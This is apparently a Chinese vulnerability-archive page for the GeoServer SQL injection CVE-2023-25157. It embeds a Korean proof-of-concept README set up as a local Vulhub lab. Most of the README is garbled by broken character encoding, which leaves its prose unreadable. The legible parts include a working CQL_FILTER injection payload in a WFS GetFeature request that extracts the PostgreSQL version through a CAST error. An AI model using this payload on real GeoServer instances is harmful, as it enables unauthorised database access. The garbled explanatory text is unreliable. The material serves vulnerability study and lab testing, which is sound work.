关联漏洞
标题:
GeoServer SQL注入漏洞
(CVE-2023-25157)
描述:GeoServer是一个用 Java 编写的开源软件服务器。允许用户共享和编辑地理空间数据。 GeoServer 2.21.4之前、2.22.2之前版本存在安全漏洞,该漏洞源于 ``strEndsWith``、``strStartsWith`` 和 ``PropertyIsLike `` 存在滥用 问题。
介绍
��#� �g�e�o�s�e�r�v�e�r� �C�V�E�-�2�0�2�3�-�2�5�1�5�7�
�
�>� �T�tǸ҇� �3�0� �[�3�0���]� �@��Ȱ�
�
�-�-�-�
�
�g�i�t�h�u�b� ���l� �-� �h�t�t�p�s�:�/�/�g�i�t�h�u�b�.�c�o�m�/�c�u�s�t�i�y�a�/�g�e�o�s�e�r�v�e�r�-�C�V�E�-�2�0�2�3�-�2�5�1�5�7�
�
�
�
�#�#�#� ���}��� ���}�
�
�*� �C�V�E�-�2�0�2�3�-�2�5�1�5�7��� �G�e�o�S�e�r�v�e�r�|��� �$��Ռ��� ���ij �p�t�0� ���D��� ��� �`��լ���t�X��� ���t� �����\� �S�Q�L�i� ���}���
�
�*� �G�e�o�S�e�r�v�e�r� �2�.�2�2�.�0� �t�X�X� �|ǀ� ��������� �����
�
�*� �W�F�S�(�W�e�b� �F�e�a�t�u�r�e� �S�e�r�v�i�c�e�)� ��ƭ�X� �C�Q�L�_�F�I�L�T�E�R�|��� ���|���0��� ���}�h�
�
�*� �xǝ���t� �t��� �A�P�I��� ����� �����X��t� ���l�� �tǩ� �����
�
�
�
�#�#�#� �Xֽ� �l�1�
�
�*� �d�o�c�k�e�r� �c�o�m�p�o�s�e� �u�p� �-�d� ����ܴ\� �LѤ¸� �Xֽ� ���
�
�*� �h�t�t�p�:�/�/�y�o�u�r�-�i�p�:�8�0�8�0�/�g�e�o�s�e�r�v�e�r� �\� ���t����� ��ȍ� �����
�
�*� �<��� �P�o�s�t�G�I�S� �p�t�0� ��ȥnj��� ���h��� �0�t� ����� ���������t�|� �h�
�
�*� �V�u�l�h�u�b�X� �G�e�o�S�e�r�v�e�r� �xǤ�4Ѥ��Ŕ� �t��� �P�o�s�t�G�I�S� �p�t�0� ��ȥnj��� �tȬ�
�
� � � � �*� ����� ����� �tDŽ� �:� �v�u�l�h�u�b�
�
� � � � �*� �p�t�0� ��ȥnj� �tDŽ� �:� �p�g�
�
� � � � �*� �L�t��� �tDŽ� �:� �e�x�a�m�p�l�e�
�
� � � � �*� �����\� ���1� �:� �n�a�m�e�
�
�
�
�#�#�#� �p�o�c�.�p�y�
�
�*� ������� ��� �X� �����D� �0���<�\� �s�q�l�i� �l�8�D� �̹� �����
�
�*� �t��� �l�8�D� �r�e�q�u�e�s�t���ȴD� �����X��� ������� ����
�
�*� �s�t�r�S�t�a�r�t�s�W�i�t�h�(�n�a�m�e�,�'�x�'�'�)� �=� �t�r�u�e�
�
� � � � �*� �x� ���X� �'�|� �X� �T� �����X�p� �s�q�l� �8��� ���4�
�
�*� �a�n�d� �1�=�(�S�E�L�E�C�T� �C�A�S�T� �(�(�S�E�L�E�C�T� �v�e�r�s�i�o�n�(�)�)� �A�S� �i�n�t�e�g�e�r�)�)�
�
� � � � �*� �v�e�r�s�i�o�n�(�)� �h��� �P�o�s�t�g�r�e�S�Q�L�X� ��֬� �����D� ���X�XՔ� �h���t�p�,� �8�����
�
� � � � �*� �C�A�S�T�(�.�.�.� �A�S� �i�n�t�e�g�e�r�)��� �����\� �����\� ���X�X���\� �$�X��� �����
�
� � � � �*� ������� ���� �T�����|� ���X�XՌ� �����,� �B�l�i�n�d� �S�Q�L� �I�n�j�e�c�t�i�o�n� �LѤ¸��� �����
�
�`�`�`�
�
�#� ����� �U�R�L�
�
�u�r�l� �=� �"�h�t�t�p�:�/�/�l�o�c�a�l�h�o�s�t�:�8�0�8�0�/�g�e�o�s�e�r�v�e�r�/�o�w�s�"�
�
�
�
�#� �C�Q�L�_�F�I�L�T�E�R��� �䴴��� ����� �x���X� �8����� �(�U�R�L� ���T�)��� �����)�
�
�c�q�l�_�f�i�l�t�e�r� �=� �"�s�t�r�S�t�a�r�t�s�W�i�t�h�(�n�a�m�e�,�'�x�'�'�)� �=� �t�r�u�e� �a�n�d� �1�=�(�S�E�L�E�C�T� �C�A�S�T� �(�(�S�E�L�E�C�T� �v�e�r�s�i�o�n�(�)�)� �A�S� �i�n�t�e�g�e�r�)�)� �-�-� �'�)� �=� �t�r�u�e�"�
�
�
�
�#� ���|���0� �$���
�
�p�a�r�a�m�s� �=� �{�
�
� � � � �"�s�e�r�v�i�c�e�"�:� �"�w�f�s�"�,�
�
� � � � �"�v�e�r�s�i�o�n�"�:� �"�1�.�0�.�0�"�,�
�
� � � � �"�r�e�q�u�e�s�t�"�:� �"�G�e�t�F�e�a�t�u�r�e�"�,�
�
� � � � �"�t�y�p�e�N�a�m�e�"�:� �"�v�u�l�h�u�b�:�e�x�a�m�p�l�e�"�,�
�
� � � � �"�C�Q�L�_�F�I�L�T�E�R�"�:� �c�q�l�_�f�i�l�t�e�r�
�
�}�
�
�`�`�`�
�
�#�#�#� �����
�
�!�[�A�l�t� �t�e�x�t�]�(�r�e�s�u�l�t�.�p�n�g�)�
�
�
�
�#�#�#� ��Ȭ�
�
�*� �t��� �p�o�c�|� ���t� �S�Q�L�i�X� ����� ��ŀ�|� �L�D� ��� ��� ������.� ������ǔ� �S�Q�L� ��Ϭ�|� ���X��� ��¤�\� ������D� �����`� ��� ���D� ��� ����.�
�
�*� �t��� �����D� �ɹ0� ���X���,� ����Ɛ� ���%��� �����t� �DՔ�t� ���������|� �\��.� ���\� ���%� ���@� �S�Q�L� �l�8�D� ���\� �����t��� �����XՔ� ���t� �D�Ȳ|� �ļij\� ��ȥ�X��� �����X���|� �\��.�
文件快照
[4.0K] /data/pocs/c98ecc87f2a64a9f3027627854a9e4ea67addbd1
├── [ 321] docker-compose.yml
├── [ 744] poc.py
├── [3.1K] README.md
├── [ 85K] result.png
└── [1.6K] startup.sh
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。